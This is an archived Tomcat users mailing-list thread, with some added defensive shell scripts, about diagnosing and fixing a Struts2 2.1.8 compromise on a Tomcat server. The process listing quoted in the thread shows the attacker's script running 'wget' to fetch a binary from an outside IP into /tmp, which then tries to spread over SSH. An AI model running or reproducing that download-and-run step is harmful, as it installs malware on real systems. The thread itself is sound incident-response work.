Re: Regarding i think an intrusion - Solved =)
Hello all. We have internally closed the issue. So I can tell you: thanks a lot, you rock =) Thanks for all your effort and time.

Kindly yours,
Leonardo

Regards.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini

2014-05-26 15:32 GMT-03:00 Leonardo Santagostini <lsantagost...@gmail.com>:
[Quoted text hidden]
Re: Regarding i think an intrusion
Well well well. Thank you all so much !!! Since the Struts upgrade I got no intrusion on my servers =) =) Thank you list for the support, for the time and for helping me with this issue.

Yours,
Leonardo

Regards.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini

2014-05-20 12:45 GMT-03:00 Leonardo Santagostini <lsantagost...@gmail.com>:
[Quoted text hidden]
Re: Regarding i think an intrusion
Hello all, again it's me =) Just to let you know that today we deployed our apps using Struts 2.3.16.2. So from today I will monitor those servers very closely =) Thanks all people. I will tell you how things go.

Regards,
Leonardo

Regards.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini

2014-05-07 12:28 GMT-03:00 Leonardo Santagostini <lsantagost...@gmail.com>:
[Quoted text hidden]
Re: Regarding i think an intrusion
Hello all ! Developers are still estimating the effort for upgrading Struts; I will let you know how things are going. Thanks all for replying to me.

Regards,
Leonardo

Regards.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini

2014-05-05 15:39 GMT-03:00 Martin Gainty <mgai...@hotmail.com>:
[Quoted text hidden]
Re: Regarding i think an intrusion
Hello all, sorry for the delay, but I was on holiday from Wednesday. Ok, I made a ticket for the developers to upgrade Struts. They told me that they will work on that. So, I will keep in touch with the news =) Again, thanks all for all the support you give me.

Regards,
Leonardo

Regards.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini

2014-05-01 18:48 GMT-03:00 Christopher Schultz <ch...@christopherschultz.net>:

> Cédric,
>
> On 5/1/14, 10:00 AM, Cédric Couralet wrote:
> > 2014-04-30 19:07 GMT+02:00 Christopher Schultz <ch...@christopherschultz.net>:
> > > Leonardo,
> > >
> > > On 4/30/14, 12:48 PM, Leonardo Santagostini wrote:
> > > > I'm uploading my logfiles so they will be available when the upload finishes.
> > >
> > > Remember to get a thread dump while Runtime.exec() is running.
> > >
> > > You should copy the script /tmp/4.sh somewhere else so you have a copy in case the attacker tries to clean-up after themselves. That's certainly what's doing the evil work.
> > >
> > > You could probably set up iptables or something to restrict outgoing requests so that the attack can't progress across your network.
> > >
> > > > Regarding the configuration, it's working in two other sites without problem, and there is no problem putting L4 balancing with haproxy. I have asked developers about that exploit, still without answer.
> > >
> > > You appear to be using struts2 2.1.8, which is in the range of versions vulnerable to this bug. There is a workaround that you can probably apply: http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the last section on this page).
> > >
> > > Of course, the vulnerability doesn't allow you to simply inject code or anything like that: you can certainly mess-around with code that is already available on the site, though.
> >
> > I think the S2-021 can be used to inject code. There is a POC circulating proving it.
> >
> > That said, this struts version (2.1.8) is also vulnerable to http://struts.apache.org/release/2.3.x/docs/s2-016.html which permits code execution very easily.
>
> Ouch.
>
> Yeah, there's always that ;)
>
> -chris

To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org
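Chris and Cédric above tie the exposure to the deployed struts2-core version (2.1.8 here) and link the S2-021 and S2-016 advisories; later in the thread the apps move to 2.3.16.2. As an added example, not part of the thread and not a script from the Struts project, the POSIX shell below inventories struts2-core jars under a Tomcat webapps directory and reports, for each version found, which of those two advisories it predates the fix for (S2-016 is fixed in 2.3.15.1 and S2-021 in 2.3.16.2, per the linked advisories). The webapps path and the `--scan` flag are assumptions, and the check covers only the two advisories named on this page.

```shell
#!/bin/sh
# Added example (not from the thread): inventory struts2-core jars in deployed
# webapps and compare their versions against the fix releases of the two
# advisories discussed above (S2-016 -> 2.3.15.1, S2-021 -> 2.3.16.2).
# The default webapps path is an assumption; pass your own as the 2nd argument.

# "struts2-core-2.1.8.jar" (or a full path to it) -> "2.1.8"
struts_version_from_jar() {
    n=$(basename "$1")
    n=${n#struts2-core-}
    printf '%s\n' "${n%.jar}"
}

# Dotted-version compare: returns 0 (true) when $1 < $2, 1 otherwise.
# Missing trailing components count as 0, so 2.3.15 < 2.3.15.1.
version_lt() {
    a="$1"; b="$2"
    while [ -n "$a" ] || [ -n "$b" ]; do
        ai="${a%%.*}"; bi="${b%%.*}"
        case "$a" in *.*) a="${a#*.}" ;; *) a="" ;; esac
        case "$b" in *.*) b="${b#*.}" ;; *) b="" ;; esac
        if [ "${ai:-0}" -lt "${bi:-0}" ]; then return 0; fi
        if [ "${ai:-0}" -gt "${bi:-0}" ]; then return 1; fi
    done
    return 1
}

# One-line verdict for a struts2-core version: lists the advisories whose
# fix release it is older than.
struts_assess() {
    v="$1"; hits=""
    if version_lt "$v" 2.3.15.1; then hits="S2-016"; fi
    if version_lt "$v" 2.3.16.2; then hits="${hits:+$hits, }S2-021"; fi
    if [ -n "$hits" ]; then
        printf 'struts2-core %s: affected by %s; upgrade to 2.3.16.2 or later\n' "$v" "$hits"
    else
        printf 'struts2-core %s: not affected by S2-016 or S2-021\n' "$v"
    fi
}

# Walk every exploded webapp under $1 and report each struts2-core jar.
scan_webapps() {
    find "$1" -name 'struts2-core-*.jar' 2>/dev/null | while read -r jar; do
        printf '%s -> ' "$jar"
        struts_assess "$(struts_version_from_jar "$jar")"
    done
}

if [ "${1:-}" = "--scan" ]; then
    scan_webapps "${2:-/var/lib/tomcat/webapps}"   # default path is an assumption
fi
```

Run it as `sh struts-check.sh --scan /path/to/webapps`. It only sees jars in exploded webapps; a WAR that Tomcat has not unpacked has to be listed separately (for example with `unzip -l`), and a vendored or renamed jar will not match the `struts2-core-*.jar` pattern.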
Re: Regarding i think an intrusion
Well, the thread dump is here: https://drive.google.com/file/d/0B5oeFmSS7h7EczdXMEF3eXRBSlk/edit?usp=sharing

Let me know if I'm missing something.

Thanks !
Leonardo

Regards.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini

2014-05-05 9:34 GMT-03:00 Leonardo Santagostini <lsantagost...@gmail.com>:
[Quoted text hidden]
Re: Regarding i think an intrusion
Leonardo,

On 5/5/14, 10:29 AM, Leonardo Santagostini wrote:
> Well, the thread dump is here: https://drive.google.com/file/d/0B5oeFmSS7h7EczdXMEF3eXRBSlk/edit?usp=sharing

Seems like it's broken.

-chris
Re: Regarding i think an intrusion
Ok, it's uploaded again. This is the link: https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing

Kind regards !,
Leonardo

Regards.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini

2014-05-05 11:57 GMT-03:00 Christopher Schultz <ch...@christopherschultz.net>:
[Quoted text hidden]
Re: Regarding i think an intrusion
Leonardo,

On 5/5/14, 11:12 AM, Leonardo Santagostini wrote:
> Ok, it's uploaded again. This is the link: https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing

1/2 GiB log file? Hrm.

It doesn't even have any calls to Runtime.exec in it. If you have a snapshot of a thread dump (and only the thread dump, I don't need 3 weeks of your logs) that you took while the intrusion was taking place, post that. If you don't, then I think you're out of luck.

Sounds like a bad time to go on holiday.

-chris
Re: Regarding i think an intrusion
Hello Chris, but this logfile was only one day.

Maybe I had a concept mismatch trying to capture the exact moment when the execution begins. My command was:

    while [ true ]; do
        # count wget processes that are not the grep itself and not local
        CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v 127.0.0.1 | wc -l)
        if [ "$CUENTO" -gt 0 ]; then
            # every java PID on the box; kill -3 asks each JVM for a thread dump
            PIDJAVA=$(ps -fea | grep java | grep -v grep | awk '{ print $2 }')
            echo -e "Se encontro wget corriendo, sacando dump de JVM..."   # "wget found running, taking JVM dump..."
            kill -3 $PIDJAVA
        fi
        sleep 3
    done

Maybe too many dumps all together; now I'm trying to get a live capture without luck =( If you know a better method, please let me know.

Thanks for your effort, kind regards,
Leonardo

Regards.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini

2014-05-05 13:06 GMT-03:00 Christopher Schultz <ch...@christopherschultz.net>:
[Quoted text hidden]
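Leonardo's loop above takes a dump of every JVM every 3 seconds for as long as any wget is running anywhere on the host, and he himself suspects the result was too many dumps piled together. As an added example (not Leonardo's script and not from the list), the POSIX shell below instead watches the Tomcat JVM's direct children for process names a servlet container has no business spawning and, on the first sighting, records the child's full command line, takes one thread dump, copies the dropped script Chris mentions earlier (/tmp/4.sh) before it can be cleaned up, and then backs off for a minute. Assumptions: the JVM is located by Tomcat's org.apache.catalina.startup.Bootstrap main class, the evidence directory and watch list are configurable placeholders, and the `--watch` flag is mine. One caveat about the dump itself: Runtime.exec() returns as soon as the child is forked, so unless the calling thread is still blocked in the call (for example in Process.waitFor()), even a dump taken the instant the child appears may show that thread elsewhere; the child's command line and the preserved script are the evidence you can count on.

```shell
#!/bin/sh
# Added example (not Leonardo's script from the thread): watch the Tomcat JVM
# for child processes it should never spawn, and capture evidence once per
# event instead of a thread dump every 3 seconds.
#
# Assumptions (not from the thread): the JVM is located by Tomcat's Bootstrap
# main class, evidence goes to $DUMP_DIR, and the dropped-script path is the
# /tmp/4.sh Chris mentions above.

DUMP_DIR="${DUMP_DIR:-/var/tmp/tomcat-evidence}"
DROPPED_SCRIPT="${DROPPED_SCRIPT:-/tmp/4.sh}"
WATCH_NAMES="${WATCH_NAMES:-wget curl sh bash dash perl python}"

# Reads "pid ppid comm" lines on stdin (the shape of `ps -eo pid=,ppid=,comm=`)
# and prints "pid comm" for each direct child of $1 whose command name is on
# the watch list. Pure text processing, so it can be exercised offline.
suspicious_children() {
    jvm_pid="$1"
    while read -r pid ppid comm; do
        [ "$ppid" = "$jvm_pid" ] || continue
        for name in $WATCH_NAMES; do
            if [ "$comm" = "$name" ]; then
                printf '%s %s\n' "$pid" "$comm"
                break
            fi
        done
    done
}

# PID of the first JVM running Tomcat's Bootstrap class (empty if none).
tomcat_jvm_pid() {
    ps -eo pid=,args= | grep -F 'org.apache.catalina.startup.Bootstrap' \
        | grep -v grep | awk 'NR == 1 { print $1 }'
}

# Snapshot what an analyst will ask for: each child's full command line and
# start time, the JVM's threads at that instant, and a copy of the dropped script.
capture_evidence() {
    jvm_pid="$1"; children="$2"
    ts=$(date +%Y%m%dT%H%M%S)
    mkdir -p "$DUMP_DIR"
    printf '%s\n' "$children" | while read -r cpid comm; do
        ps -o pid=,ppid=,user=,lstart=,args= -p "$cpid" >> "$DUMP_DIR/children-$ts.txt" 2>/dev/null || true
    done
    if command -v jstack >/dev/null 2>&1; then
        jstack "$jvm_pid" > "$DUMP_DIR/threads-$ts.txt" 2>&1 || true
    else
        kill -3 "$jvm_pid"    # the dump lands in the JVM's stdout (catalina.out)
    fi
    if [ -f "$DROPPED_SCRIPT" ]; then
        cp -p "$DROPPED_SCRIPT" "$DUMP_DIR/dropped-$ts.sh"
    fi
    echo "$ts: JVM $jvm_pid spawned: $children"
}

watch_loop() {
    while :; do
        jvm_pid=$(tomcat_jvm_pid)
        if [ -n "$jvm_pid" ]; then
            found=$(ps -eo pid=,ppid=,comm= | suspicious_children "$jvm_pid")
            if [ -n "$found" ]; then
                capture_evidence "$jvm_pid" "$found"
                sleep 60    # one capture per event, not one per tick
            fi
        fi
        sleep 1
    done
}

if [ "${1:-}" = "--watch" ]; then
    watch_loop
fi
```

Run it as `sh jvm-watch.sh --watch` under the same user that can signal the Tomcat JVM. Only direct children are checked: a payload started through `sh -c` shows up as `sh`, with the real command (and any wget it launches) visible in the recorded `args`, while the wget itself would be a grandchild. Adjust `WATCH_NAMES` if your deployment legitimately spawns one of those names.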
RE: Regarding i think an intrusion
> Subject: Re: Regarding i think an intrusion
> From: lsantagost...@gmail.com
> To: users@tomcat.apache.org
>
> Hello Chris, but this logfile was only one day.

MG> Ay Caramba!

> Maybe I had a concept mismatch trying to capture the exact moment when the execution begins.
>
> My command was
>
> while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v 127.0.0.1 | wc -l); if [ $CUENTO -gt 0 ] ; then PIDJAVA=$(ps -fea | grep java | grep -v grep | awk '{ print $2 }'); echo -e Se encontro wget corriendo, sacando dump de JVM... ; kill -3 $PIDJAVA; fi; sleep 3; done
>
> Maybe too many dumps all together, now I'm trying to get a live capture without luck =(
>
> If you know a better method, please let me know.
>
> Thanks for your effort, kind regards,
> Leonardo
>
> Regards.-
> Leonardo Santagostini

MG> Tomcat APR cannot use WebSockets with JDK 1.6 ... you need to use JDK @ 1.7 (now)

MG> this:

ContainerBackgroundProcessor[StandardEngine[Catalina]] daemon prio=10 tid=0x52867800 nid=0x2550 waiting on condition [0x4105e000]
   java.lang.Thread.State: TIMED_WAITING (sleeping)
        at java.lang.Thread.sleep(Native Method)
        at org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508)
        at java.lang.Thread.run(Thread.java:662)

MG> These informational records produce A LOT of noise

MG> log4j.properties
MG> log4j.logger.org.quartz=OFF //(Quiet, Quartz)

MG> that:

ajp-bio-8009-exec-37 daemon prio=10 tid=0x2aaac07fd800 nid=0x2656 runnable [0x46f34000]
   java.lang.Thread.State: RUNNABLE
        at java.util.regex.Pattern$6.isSatisfiedBy(Pattern.java:4763)
        at java.util.regex.Pattern$CharProperty.match(Pattern.java:3345)
        at java.util.regex.Pattern$Curly.match0(Pattern.java:3770)
        at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
        at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
        at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
        at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
        at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
        at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
        at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
        at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
        at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
        (this five-frame Curly/GroupHead/Loop/GroupTail cycle repeats down the rest of the stack)
Re: Regarding i think an intrusion
2014-04-30 19:07 GMT+02:00 Christopher Schultz ch...@christopherschultz.net:
> Leonardo,
>
> On 4/30/14, 12:48 PM, Leonardo Santagostini wrote:
> > I'm uploading my logfiles so it will be available when finished uploading.
>
> Remember to get a thread dump while Runtime.exec() is running.
>
> You should copy the script /tmp/4.sh somewhere else so you have a copy in case the attacker tries to clean-up after themselves. That's certainly what's doing the evil work.
>
> You could probably set up iptables or something to restrict outgoing requests so that the attack can't progress across your network.
>
> > Regarding the configuration, it's working in two other sites without problem, and there is no problem putting L4 balancing with haproxy.
> >
> > I have asked developers about that exploit, still without answer.
>
> You appear to be using struts2 2.1.8, which is in the range of versions vulnerable to this bug. There is a workaround that you can probably apply:
> http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the last section on this page).
>
> Of course, the vulnerability doesn't allow you to simply inject code or anything like that: you can certainly mess-around with code that is already available on the site, though.

I think the S2-021 can be used to inject code. There is a POC circulating proving it.

That said, this struts version (2.1.8) is also vulnerable to http://struts.apache.org/release/2.3.x/docs/s2-016.html which permits code execution very easily.

> - -chris
Re: Regarding i think an intrusion
Cédric,

On 5/1/14, 10:00 AM, Cédric Couralet wrote:
> 2014-04-30 19:07 GMT+02:00 Christopher Schultz ch...@christopherschultz.net:
> > You appear to be using struts2 2.1.8, which is in the range of versions vulnerable to this bug. There is a workaround that you can probably apply:
> > http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the last section on this page).
> >
> > Of course, the vulnerability doesn't allow you to simply inject code or anything like that: you can certainly mess-around with code that is already available on the site, though.
>
> I think the S2-021 can be used to inject code. There is a POC circulating proving it.
>
> That said, this struts version (2.1.8) is also vulnerable to http://struts.apache.org/release/2.3.x/docs/s2-016.html which permits code execution very easily.

Ouch.

Yeah, there's always that ;)

- -chris
Re: Regarding i think an intrusion
Konstantin,

On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
> 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini lsantagost...@gmail.com:
> > Hello Dan,
> >
> > Nope, the attacker is executing locally the following
> >
> > tomcat 8882 1 0 Apr27 ? 00:00:00 sh /tmp/4.sh
> > tomcat 8893 8882 0 Apr27 ? 00:00:00 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid
> >
> > And then it launches squid, which tries to connect via ssh to various places.
> >
> > Right now it's time to leave the office, but in a few hours I will paste in pastebin access logs, config files, whatever you tell me.
> >
> > This is my pstree
> >
> > [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
> > init─┬─atd
> >      ├─java─┬─sh───wget
> >      │      └─263*[{java}]
>
> sh launched by tomcat's java?
>
> Yes: please verify that it's the JVM running Tomcat, and not just any JVM process.
>
> Take a thread dump:
> https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
>
> It shall show the stack trace of the thread that launched the external process.

+1

The only things that ship with Tomcat that call Process.exec() are the CGI servlet and SSI, both of which are disabled by default. So, either you have an insecure CGI/SSI configuration, your web application has a vulnerability, or you have deployed something like the Manager application and improperly-secured it.

A classic example of such an intrusion might be that someone got a foothold elsewhere into your network, and the Manager web application is not properly secured with a password, etc.

- -chris
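Once a dump has been captured, the following added script (mine, not from the thread) does what Konstantin and Chris ask for: it picks out the thread that spawned, or is waiting on, an external process and names the first frame outside the JDK and Tomcat itself, which is the webapp or framework code path to investigate. The sample dump is constructed; its frames are abbreviated and the line numbers arbitrary.

```shell
#!/bin/sh
# Added example, not from the thread: find the thread behind Process.exec()
# in a HotSpot thread dump. Sample data below is constructed.

# find_exec_threads: read a thread dump on stdin (threads are separated by
# blank lines) and print "<thread name>: <culprit frame>" for each thread
# whose stack goes through java.lang.ProcessBuilder, Runtime.exec,
# UNIXProcess or ProcessImpl. The culprit is the first frame that is not
# JDK, reflection or Tomcat container code.
find_exec_threads() {
    awk '
        BEGIN { RS = ""; FS = "\n" }            # one record per thread
        /java\.lang\.(ProcessBuilder|Runtime\.exec|UNIXProcess|ProcessImpl)/ {
            name = $1
            sub(/^"/, "", name); sub(/".*$/, "", name)
            culprit = "(no frame outside JDK/Tomcat)"
            for (i = 2; i <= NF; i++) {
                frame = $i
                sub(/^[ \t]+/, "", frame)
                if (frame !~ /^at /) continue
                # skip JDK, reflection and Tomcat container frames
                if (frame ~ /^at (java\.|javax\.|sun\.|org\.apache\.(catalina|coyote|tomcat)\.)/) continue
                culprit = frame
                break
            }
            print name ": " culprit
        }'
}

# Constructed sample dump: the first two threads mirror the ones Martin
# pasted, the third is what a request thread blocked on a spawned process
# looks like when the call came in through OGNL (frames abbreviated,
# line numbers arbitrary).
SAMPLE_DUMP='Full thread dump Java HotSpot(TM) 64-Bit Server VM (20.14-b01 mixed mode):

"ContainerBackgroundProcessor[StandardEngine[Catalina]]" daemon prio=10 tid=0x52867800 nid=0x2550 waiting on condition [0x4105e000]
   java.lang.Thread.State: TIMED_WAITING (sleeping)
        at java.lang.Thread.sleep(Native Method)
        at org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508)
        at java.lang.Thread.run(Thread.java:662)

"ajp-bio-8009-exec-37" daemon prio=10 tid=0x2aaac07fd800 nid=0x2656 runnable [0x46f34000]
   java.lang.Thread.State: RUNNABLE
        at java.util.regex.Pattern$6.isSatisfiedBy(Pattern.java:4763)
        at java.util.regex.Pattern$CharProperty.match(Pattern.java:3345)
        at java.util.regex.Pattern$Curly.match0(Pattern.java:3770)

"ajp-bio-8009-exec-12" daemon prio=10 tid=0x2aaac0801000 nid=0x2661 in Object.wait() [0x47035000]
   java.lang.Thread.State: WAITING (on object monitor)
        at java.lang.Object.wait(Native Method)
        at java.lang.UNIXProcess.waitFor(UNIXProcess.java:210)
        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39)
        at java.lang.reflect.Method.invoke(Method.java:597)
        at ognl.OgnlRuntime.invokeMethod(OgnlRuntime.java:508)
        at ognl.OgnlRuntime.callAppropriateMethod(OgnlRuntime.java:1210)
        at org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter.doFilter(StrutsPrepareAndExecuteFilter.java:74)
        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:305)
        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:210)
        at java.lang.Thread.run(Thread.java:662)'

# Stand-alone run over the constructed sample:
#   printf '%s\n' "$SAMPLE_DUMP" | find_exec_threads
# On a live system: find_exec_threads < catalina.out
```

Feed it the catalina.out that received the kill -3 dump; if the dump was taken after the spawning call had already returned, no thread matches, which is why the dump has to be taken while the child process is still alive.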
Re: Regarding i think an intrusion
Ok, I will do the following:

1) thread dump of running tomcat instance
2) Pastebin the running tomcat config

I think at mid day I will have all the info.

Thanks all for replying me and all the responses.

Regards,
Leonardo

Regards.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini

2014-04-30 10:55 GMT-03:00 Christopher Schultz ch...@christopherschultz.net:
> Konstantin,
>
> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
> > Take a thread dump:
> > https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
> >
> > It shall show the stack trace of the thread that launched the external process.
>
> +1
>
> The only things that ship with Tomcat that call Process.exec() are the CGI servlet and SSI, both of which are disabled by default. So, either you have an insecure CGI/SSI configuration, your web application has a vulnerability, or you have deployed something like the Manager application and improperly-secured it.
>
> A classic example of such an intrusion might be that someone got a foothold elsewhere into your network, and the Manager web application is not properly secured with a password, etc.
>
> - -chris
Re: Regarding i think an intrusion
Hello list, well my homework is done

Here are the links:
setenv.sh: http://pastebin.com/EN1mXDFi
catalina.sh: http://pastebin.com/1vRVLbSm
web.xml: http://pastebin.com/BqEfiXXm
server.xml: http://pastebin.com/wfzE8bYU
logging.properties: http://pastebin.com/Qurk8sLU
catalina.properties: http://pastebin.com/jkfY1ZRQ
tree + logfiles: http://pastebin.com/j3tip4ij

Note that logfiles are not the logfiles themselves but only a ls -lah (just for you to see the log sizes)

A little more about the infrastructure I've mounted, I'll do some ascii art.

internet --- FW --nat--Haproxy (1)--Apache(2)-- mod_jk (3)--Haproxy(4)-- Tomcat7(5) -- haproxy(6) --Tomcat(7)

Apache(2) is serving static content so haproxy(1) at the first level does http round robin balancing
Apache(2) connects to tomcat(5) through haproxy(4) (using L4 connection) using mod_jk(3)
Tomcat(5) are the main app servers (the ones that get intruded), which use tomcat(7) (solr service) through haproxy(6) using an L4 connection.

Versions:
Apache: 2.2.17
mod_jk: 1.2.31
haproxy: 1.4.22
Tomcat: 7.0.53
Java: 1.6.0.41

[root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version
java version 1.6.0_41
Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)

OS: CentOS 5.8 64 bit
[root@arcbaappvrt05 tomcat]# uname -a
Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb 21 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
[root@arcbaappvrt05 tomcat]# cat /etc/redhat-release
CentOS release 5.8 (Final)
[root@arcbaappvrt05 tomcat]#

For now I haven't seen that the squid process was launched, so I couldn't do a dump.

Let me know if you need more information.

BTW, pastebin links will work for one week.

Kind regards, yours

Regards.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini

2014-04-30 11:09 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com:
> Ok, I will do the following:
>
> 1) thread dump of running tomcat instance
> 2) Pastebin the running tomcat config
>
> I think at mid day I will have all the info.
>
> 2014-04-30 10:55 GMT-03:00 Christopher Schultz ch...@christopherschultz.net:
> > Konstantin,
> >
> > On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
> > > Take a thread dump:
> > > https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
> > >
> > > It shall show the stack trace of the thread that launched the external process.
> >
> > +1
> >
> > The only things that ship with Tomcat that call Process.exec() are the CGI servlet and SSI, both of which are disabled by default. So, either you have an insecure CGI/SSI configuration, your web application has a vulnerability, or you have deployed something like the Manager application and improperly-secured it.
> >
> > - -chris
Re: Regarding i think an intrusion
Leonardo,

You need to post a thread dump as well.

- -chris

On 4/30/14, 11:35 AM, Leonardo Santagostini wrote:
> Hello list, well my homework is done
>
> Here are the links:
> setenv.sh: http://pastebin.com/EN1mXDFi
> catalina.sh: http://pastebin.com/1vRVLbSm
> web.xml: http://pastebin.com/BqEfiXXm
> server.xml: http://pastebin.com/wfzE8bYU
> logging.properties: http://pastebin.com/Qurk8sLU
> catalina.properties: http://pastebin.com/jkfY1ZRQ
> tree + logfiles: http://pastebin.com/j3tip4ij
>
> Note that logfiles are not the logfiles themselves but only a ls -lah (just for you to see the log sizes)
>
> For now I haven't seen that the squid process was launched, so I couldn't do a dump.
>
> Let me know if you need more information.
>
> BTW, pastebin links will work for one week.
RE: Regarding i think an intrusion
> Date: Wed, 30 Apr 2014 12:35:52 -0300
> Subject: Re: Regarding i think an intrusion
> From: lsantagost...@gmail.com
> To: users@tomcat.apache.org
>
> Hello list, well my homework is done
>
> Here are the links:
> setenv.sh: http://pastebin.com/EN1mXDFi
> catalina.sh: http://pastebin.com/1vRVLbSm
> web.xml: http://pastebin.com/BqEfiXXm
> server.xml: http://pastebin.com/wfzE8bYU
> logging.properties: http://pastebin.com/Qurk8sLU
> catalina.properties: http://pastebin.com/jkfY1ZRQ
> tree + logfiles: http://pastebin.com/j3tip4ij

MG> Please paste the contents of the following log files in Pastebin and send us the link:

-rw-rw-r-- 1 tomcat tomcat 5.0K Apr 30 05:38 localhost.2014-04-30.log
-rw-rw-r-- 1 tomcat tomcat 5.4M Apr 30 12:19 localhost_access_log.2014-04-30.txt
-rw-rw-r-- 1 tomcat tomcat    0 Apr 30 05:38 manager.2014-04-30.log
-rw-rw-r-- 1 tomcat tomcat 3.7M Apr 30 12:19 PDI_access_log.2014-04-30.txt
-rw-rw-r-- 1 tomcat tomcat  43M Apr 30 12:18 portal-ht.log
-rw-rw-r-- 1 tomcat tomcat 583K Apr 30 10:09 portal-mh.log
-rw-rw-r-- 1 tomcat tomcat  58M Apr 30 12:19 portal-pdi.log
-rw-rw-r-- 1 tomcat tomcat 3.5M Apr 30 12:18 portal-rt.log
-rw-rw-r-- 1 tomcat tomcat 3.6M Apr 30 12:18 probe.log
-rw-rw-r-- 1 tomcat tomcat 591K Apr 30 12:18 RT_access_log.2014-04-30.txt

MG> Kind regards from the USA

> Note that logfiles are not the logfiles themselves but only a ls -lah (just for you to see the log sizes)
Re: Regarding i think an intrusion
On 30. April 2014 17:35:52 MESZ, Leonardo Santagostini lsantagost...@gmail.com wrote:
> Hello list, well my homework is done
>
> Here are the links:
> setenv.sh: http://pastebin.com/EN1mXDFi
> catalina.sh: http://pastebin.com/1vRVLbSm
> web.xml: http://pastebin.com/BqEfiXXm
> server.xml: http://pastebin.com/wfzE8bYU
> logging.properties: http://pastebin.com/Qurk8sLU
> catalina.properties: http://pastebin.com/jkfY1ZRQ
> tree + logfiles: http://pastebin.com/j3tip4ij

From the logfiles it looks like you have struts2 applications. It might be that you are hit by a security problem within struts2 (Konstantin forwarded a warning a few days ago: http://tomcat.10.x6.nabble.com/Fwd-ANN-Struts-2-up-to-2-3-16-1-Zero-Day-Exploit-Mitigation-security-critical-td5016578.html).

> Note that logfiles are not the logfiles themselves but only a ls -lah (just for you to see the log sizes)
>
> A little more about the infrastructure I've mounted, I'll do some ascii art.
>
> internet --- FW --nat--Haproxy (1)--Apache(2)-- mod_jk (3)--Haproxy(4)-- Tomcat7(5) -- haproxy(6) --Tomcat(7)

That seems a bit too complex. In my eyes you need no haproxy between httpd and tomcat when you use mod_jk.

Regards
Felix

> Apache(2) is serving static content so haproxy(1) at the first level does http round robin balancing
> Apache(2) connects to tomcat(5) through haproxy(4) (using L4 connection) using mod_jk(3)
> Tomcat(5) are the main app servers (the ones that get intruded), which use tomcat(7) (solr service) through haproxy(6) using an L4 connection.
Re: Regarding i think an intrusion
Hello Martin/Felix,

I'm uploading my logfiles, so they will be available when finished uploading.

Regarding the configuration, it's working in two other sites without problem, and there is no problem putting L4 balancing with haproxy.

I have asked the developers about that exploit, still without an answer.

I will let you know how things are going, thanks for all =)

Regards/Saludos!

BTW: Martin, thanks for your Spanish words. Really appreciated =)

Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini

2014-04-30 13:20 GMT-03:00 Felix Schumacher felix.schumac...@internetallee.de:
> [...]
Re: Regarding i think an intrusion
Leonardo,

On 4/30/14, 12:48 PM, Leonardo Santagostini wrote:
> I'm uploading my logfiles, so they will be available when finished uploading.

Remember to get a thread dump while Runtime.exec() is running.

You should copy the script /tmp/4.sh somewhere else so you have a copy in case the attacker tries to clean up after themselves. That's certainly what's doing the evil work.

You could probably set up iptables or something to restrict outgoing requests so that the attack can't progress across your network.

> Regarding the configuration, it's working in two other sites without problem, and there is no problem putting L4 balancing with haproxy.
>
> I have asked the developers about that exploit, still without an answer.

You appear to be using struts2 2.1.8, which is in the range of versions vulnerable to this bug. There is a workaround that you can probably apply: http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the last section on this page).

Of course, the vulnerability doesn't allow you to simply inject code or anything like that: you can certainly mess around with code that is already available on the site, though.

-chris

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org
